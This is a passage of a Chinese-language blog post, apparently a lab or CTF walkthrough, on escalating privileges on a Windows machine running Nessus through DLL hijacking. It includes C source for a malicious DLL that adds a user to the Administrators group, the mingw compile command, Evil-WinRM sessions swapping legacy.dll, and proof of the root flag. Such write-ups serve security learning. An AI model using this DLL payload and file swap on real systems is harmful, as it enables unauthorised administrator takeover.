BUILTIN\\Administrators:(I)(F)\n                                         BUILTIN\\Users:(I)(RX)\n                                         NESSUS\\nesus:(I)(F)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\icudt73.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\icuuc73.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\legacy.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                           BUILTIN\\Administrators:(I)(F)\n                                           BUILTIN\\Users:(I)(RX)\n                                           NESSUS\\nesus:(I)(F)\n                                           APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                           APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\License.rtf NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nasl.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                         BUILTIN\\Administrators:(I)(F)\n                                         BUILTIN\\Users:(I)(RX)\n                                         NESSUS\\nesus:(I)(F)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\ndbg.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                         BUILTIN\\Administrators:(I)(F)\n                                         BUILTIN\\Users:(I)(RX)\n                                         NESSUS\\nesus:(I)(F)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\Nessus Web Client.url NT AUTHORITY\\SYSTEM:(I)(F)\n                                                      BUILTIN\\Administrators:(I)(F)\n                                                      BUILTIN\\Users:(I)(RX)\n                                                      NESSUS\\nesus:(I)(F)\n                                                      APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                                      APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nessus-service.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                                   BUILTIN\\Administrators:(I)(F)\n                                                   BUILTIN\\Users:(I)(RX)\n                                                   NESSUS\\nesus:(I)(F)\n                                                   APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                                   APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nessuscli.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                              BUILTIN\\Administrators:(I)(F)\n                                              BUILTIN\\Users:(I)(RX)\n                                              NESSUS\\nesus:(I)(F)\n                                              APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                              APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nessusd.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nSuccessfully processed 12 files; Failed processing 0 files<\/code><\/pre>\n<blockquote>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\"><strong>\u7b26\u53f7<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u6743\u9650\u8bf4\u660e<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u5bf9\u5e94\u64cd\u4f5c<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><code>F<\/code><\/td>\n<td style=\"text-align: center;\">\u5b8c\u5168\u63a7\u5236<\/td>\n<td style=\"text-align: center;\">\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u3001\u5220\u9664\u3001\u4fee\u6539\u5c5e\u6027<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>M<\/code><\/td>\n<td style=\"text-align: center;\">\u4fee\u6539<\/td>\n<td style=\"text-align: center;\">\u5199\u5165\u3001\u5220\u9664\uff08\u9700\u914d\u5408<code>F<\/code>\uff09<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>RX<\/code><\/td>\n<td style=\"text-align: center;\">\u8bfb\u53d6\u548c\u6267\u884c<\/td>\n<td style=\"text-align: center;\">\u67e5\u770b\u5185\u5bb9\u3001\u8fd0\u884c\u7a0b\u5e8f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>R<\/code><\/td>\n<td style=\"text-align: center;\">\u53ea\u8bfb<\/td>\n<td style=\"text-align: center;\">\u67e5\u770b\u5185\u5bb9<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>W<\/code><\/td>\n<td style=\"text-align: center;\">\u5199\u5165<\/td>\n<td style=\"text-align: center;\">\u4fee\u6539\u5185\u5bb9\uff08\u9700\u76ee\u5f55\u6743\u9650\uff09<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>D<\/code><\/td>\n<td style=\"text-align: center;\">\u5220\u9664<\/td>\n<td style=\"text-align: center;\">\u5220\u9664\u6587\u4ef6\u6216\u5b50\u76ee\u5f55<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong><code>F<\/code><\/strong>\uff1a\u5b8c\u5168\u63a7\u5236\uff08Full Control\uff09\uff1a \u5305\u542b\u6240\u6709\u6743\u9650\uff08\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u3001\u5220\u9664\u3001\u4fee\u6539\u5c5e\u6027\u7b49\uff09\uff0c\u53ef\u5b8c\u5168\u63a7\u5236\u6587\u4ef6\u6216\u76ee\u5f55\u3002<\/p>\n<\/blockquote>\n<p>\u5929\u5927\u7684\u597d\u6d88\u606f\uff0c\u5b8c\u5168\u6743\u9650\uff0c\u53ea\u8981\u77e5\u9053\u76ee\u6807\u8fd0\u7528\u4e86\u54ea\u4e2a<code>dll<\/code>\u5c31\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\u4e86\uff01\uff01\u8fd9\u91cc\u6211\u4e0a\u4f20\u4e86<code>Listdlls<\/code>\u5c1d\u8bd5\u4f7f\u7528<code>C:\\Users\\nesus\\desktop\\Listdlls.exe -accepteula<\/code>\u5217\u51fa\u4e86\u4e00\u4e9b\u6743\u9650\uff0c\u4f46\u662f\u6ca1\u5565\u7528\uff0c\u8fd9\u91cc\u968f\u4fbf\u6311\u4e00\u4e2adll\u52ab\u6301\u4e00\u4e0b\u5427\uff0c\u4e0d\u884c\u5c31\u90fd\u5c1d\u8bd5\u52ab\u6301\uff0c\u53cd\u6b63\u54b1\u4eec\u90fd\u6709\u6743\u9650\uff01<\/p>\n<h3>dll\u52ab\u6301<\/h3>\n<p>\u5728\u7f51\u4e0a\u627e\u4e86\u4e00\u4e2adll\u7684\u52ab\u6301\u811a\u672c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<a href=\"https:\/\/cocomelonc.github.io\/pentest\/2021\/09\/24\/dll-hijacking-1.html\">https:\/\/cocomelonc.github.io\/pentest\/2021\/09\/24\/dll-hijacking-1.html<\/a><\/p>\n<p>\u4e5f\u53ef\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/windows-local-privilege-escalation\/dll-hijacking\/index.html?highlight=windows%20dll#dll-search-order\">https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/windows-local-privilege-escalation\/dll-hijacking\/index.html?highlight=windows%20dll#dll-search-order<\/a><\/p>\n<pre><code class=\"language-c\">\/*\nDLL hijacking example\nauthor: @cocomelonc\n*\/\n\n#include &lt;windows.h&gt;\n\nBOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {\n    switch (ul_reason_for_call)  {\n    case DLL_PROCESS_ATTACH:\n      system(&quot;cmd.exe \/k net localgroup administrators nesus \/add&quot;);\n      break;\n    case DLL_PROCESS_DETACH:\n      break;\n    case DLL_THREAD_ATTACH:\n      break;\n    case DLL_THREAD_DETACH:\n      break;\n    }\n    return TRUE;\n}<\/code><\/pre>\n<p>\u8fdb\u884c\u7f16\u8bd1\uff0c\u518d\u4e0a\u4f20\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dll<\/code><\/pre>\n<p>\u8fd9\u91cc\u5fd8\u4e86\u8fdb\u884c\u5907\u4efd\u4e86\uff0c\u6240\u4ee5\u63a5\u4e0b\u6765\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; mv legacy.dll legacy_beifen.dll\n\nError: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for &quot;192.168.10.105&quot; port 5985 (192.168.10.105:5985)\n\nError: Exiting with code 1\n\/usr\/bin\/evil-winrm: warning: Exception in finalizer #&lt;Proc:0x00007f63bad27b28 \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/shells\/power_shell.rb:33&gt;\n\/usr\/lib\/ruby\/vendor_ruby\/logging\/diagnostic_context.rb:471:in `new&#039;: can&#039;t alloc thread (ThreadError)\n        from \/usr\/lib\/ruby\/vendor_ruby\/logging\/diagnostic_context.rb:471:in `create_with_logging_context&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/logging\/diagnostic_context.rb:436:in `new&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:98:in `create_timeout_thread&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:131:in `block in ensure_timeout_thread_created&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:129:in `synchronize&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:129:in `ensure_timeout_thread_created&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:178:in `timeout&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient\/session.rb:748:in `connect&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient\/session.rb:511:in `query&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient\/session.rb:177:in `query&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1246:in `do_get_block&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1023:in `block in do_request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1137:in `protect_keep_alive_disconnected&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1018:in `do_request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:860:in `request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:769:in `post&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/http\/transport.rb:176:in `send_request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/shells\/power_shell.rb:42:in `close_shell&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/shells\/power_shell.rb:33:in `block in finalize&#039;<\/code><\/pre>\n<p>\u574f\u4e86\uff0c\u5e94\u8be5\u4e00\u8d77\u641e\u7684\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011614.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011614.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609235154559\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u767b\u5f55\u4e0d\u4e0a\u53bb\u4e86\u3002\u3002\u3002\u3002\u624d\u53d1\u73b0\u662f\u9776\u673a\u81ea\u5df1\u5173\u6389\u4e86\uff0c\u91cd\u542f\u4e00\u4e0b\uff0c\u53e6\u5916\u8bf4\u4e00\u53e5\u8fd9\u4e2a\u9776\u673a\u5df2\u7ecf\u81ea\u5df1\u5173\u597d\u51e0\u6b21\u4e86\u3002\u3002\u3002\u91cd\u542f\u8fde\u63a5\u4ee5\u540e\u91cd\u65b0\u6765\u4e00\u6b21\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\Documents&gt; cd &quot;C:\\Program Files\\Tenable\\Nessus&quot;\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; dir\n\n    Directory: C:\\Program Files\\Tenable\\Nessus\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024  10:35 AM              1 .winperms\n-a----          6\/9\/2025   8:48 AM          86510 exp.dll\n-a----          5\/9\/2024  11:30 PM        2471544 fips.dll\n-a----          5\/9\/2024  11:30 PM        5217912 icudt73.dll\n-a----          5\/9\/2024  11:30 PM        1575032 icuuc73.dll\n-a----          5\/9\/2024  11:30 PM        4988536 legacy.dll\n-a----          5\/9\/2024  11:06 PM         375266 License.rtf\n-a----          6\/9\/2025   8:21 AM         424096 Listdlls.exe\n-a----          5\/9\/2024  11:37 PM       11204728 nasl.exe\n-a----          5\/9\/2024  11:31 PM         264824 ndbg.exe\n-a----          5\/9\/2024  11:06 PM             46 Nessus Web Client.url\n-a----          5\/9\/2024  11:33 PM          38520 nessus-service.exe\n-a----          5\/9\/2024  11:37 PM       11143800 nessuscli.exe\n-a----          5\/9\/2024  11:38 PM       11925624 nessusd.exe\n\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; whoami\nnessus\\nesus\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name    SID\n============ ============================================\nnessus\\nesus S-1-5-21-2986980474-46765180-2505414164-1001\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                             Type             SID          Attributes\n====================================== ================ ============ ==================================================\nEveryone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Remote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group\nMandatory Label\\Medium Mandatory Level Label            S-1-16-8192\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                    State\n============================= ============================== =======\nSeChangeNotifyPrivilege       Bypass traverse checking       Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\n\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; mv legacy.dll legacy_beifen.dll; mv exp.dll legacy.dll<\/code><\/pre>\n<p>\u56e0\u4e3a\u4e0d\u60f3\u7b49\u5f85\u4e86\uff0c\u5c1d\u8bd5\u91cd\u542f\u9776\u673a\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6210\u529f\u4fee\u6539\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ evil-winrm -i $IP -u nesus -p password\n\nEvil-WinRM shell v3.7\n\nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&#039; for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nesus\\Documents&gt; cd &quot;C:\\Program Files\\Tenable\\Nessus&quot;\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; dir\n\n    Directory: C:\\Program Files\\Tenable\\Nessus\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024  10:35 AM              1 .winperms\n-a----          5\/9\/2024  11:30 PM        2471544 fips.dll\n-a----          5\/9\/2024  11:30 PM        5217912 icudt73.dll\n-a----          5\/9\/2024  11:30 PM        1575032 icuuc73.dll\n-a----          6\/9\/2025   8:48 AM          86510 legacy.dll\n-a----          5\/9\/2024  11:30 PM        4988536 legacy_beifen.dll\n-a----          5\/9\/2024  11:06 PM         375266 License.rtf\n-a----          6\/9\/2025   8:21 AM         424096 Listdlls.exe\n-a----          5\/9\/2024  11:37 PM       11204728 nasl.exe\n-a----          5\/9\/2024  11:31 PM         264824 ndbg.exe\n-a----          5\/9\/2024  11:06 PM             46 Nessus Web Client.url\n-a----          5\/9\/2024  11:33 PM          38520 nessus-service.exe\n-a----          5\/9\/2024  11:37 PM       11143800 nessuscli.exe\n-a----          5\/9\/2024  11:38 PM       11925624 nessusd.exe\n\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name    SID\n============ ============================================\nnessus\\nesus S-1-5-21-2986980474-46765180-2505414164-1001\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                                                    Type             SID          Attributes\n============================================================= ================ ============ ===============================================================\nEveryone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner\nNT AUTHORITY\\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group\nMandatory Label\\High Mandatory Level                          Label            S-1-16-12288\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            Description                                                        State\n========================================= ================================================================== =======\nSeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled\nSeSecurityPrivilege                       Manage auditing and security log                                   Enabled\nSeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled\nSeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled\nSeSystemProfilePrivilege                  Profile system performance                                         Enabled\nSeSystemtimePrivilege                     Change the system time                                             Enabled\nSeProfileSingleProcessPrivilege           Profile single process                                             Enabled\nSeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled\nSeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled\nSeBackupPrivilege                         Back up files and directories                                      Enabled\nSeRestorePrivilege                        Restore files and directories                                      Enabled\nSeShutdownPrivilege                       Shut down the system                                               Enabled\nSeDebugPrivilege                          Debug programs                                                     Enabled\nSeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled\nSeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled\nSeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled\nSeUndockPrivilege                         Remove computer from docking station                               Enabled\nSeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled\nSeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled\nSeCreateGlobalPrivilege                   Create global objects                                              Enabled\nSeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled\nSeTimeZonePrivilege                       Change the time zone                                               Enabled\nSeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled<\/code><\/pre>\n<p>\u770b\u6765\u662f\u6210\u529f\u4e86\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u62ff\u6389<code>rootflag<\/code>\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; cd c:\/users\/Administrator\n*Evil-WinRM* PS C:\\users\\Administrator&gt; cd desktop\n*Evil-WinRM* PS C:\\users\\Administrator\\desktop&gt; dir\n\n    Directory: C:\\users\\Administrator\\desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024  12:11 PM             70 root.txt\n\n*Evil-WinRM* PS C:\\users\\Administrator\\desktop&gt; type root.txt\nb5fc5a4ebfc20cc18220a814e1aee0aa<\/code><\/pre>\n<p>\u53ef\u4ee5\u6b63\u5e38\u62ff\u5230\uff0c\u8bf4\u660e\u5176\u5b9e\u5c31\u662f<code>administrator<\/code>\u7ec4\u6743\u9650\u7684<code>shell<\/code>\u4e86\uff01<\/p>\n<h2>\u5173\u4e8ecrackmapexec<\/h2>\n<p><code>NetExec<\/code>\u662f<code>CrackMapExec<\/code>\u7684\u73b0\u4ee3\u7ee7\u4efb\u8005\uff0c\u7531\u793e\u533a\u7ef4\u62a4\uff0c\u800c<code>CrackMapExec<\/code>\u4e4b\u524d\u7531<code>@byt3bl33d3r<\/code>\u521b\u5efa\uff0c\u540e\u6765\u7ef4\u62a4\u6743\u8f6c\u4ea4\uff0c\u4f46\u540e\u6765\u7ef4\u62a4\u8005\u9000\u4f11\u4e86\uff0c\u5bfc\u81f4\u9879\u76ee\u505c\u6ede\uff0c\u7136\u540e\u793e\u533a\u63a5\u624b\u6210\u4e3aNetExec\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ netexec smb $IP --loggedon-users -u nesus -p password\nSMB         192.168.10.100  445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)\nSMB         192.168.10.100  445    NESSUS           [+] Nessus\\nesus:password \nSMB         192.168.10.100  445    NESSUS           [+] Enumerated logged_on users<\/code><\/pre>\n<h2>\u5173\u4e8e\u9a8c\u8bc1\u54ea\u4e9b\u51fd\u6570\u53ef\u7528dll\u52ab\u6301<\/h2>\n<p><a href=\"https:\/\/www.nirsoft.net\/utils\/dll_export_viewer.html\">DLL Export Viewer<\/a> \u53ef\u7528\u67e5\u770b\u54ea\u4e9b\u51fd\u6570\u53ef\u7528\uff0c\u7136\u540e\u7528\u4e8e\u7f16\u5199\u811a\u672c\u8fdb\u884c\u52ab\u6301\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nessus \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-845","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=845"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/845\/revisions"}],"predecessor-version":[{"id":846,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/845\/revisions\/846"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=845"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}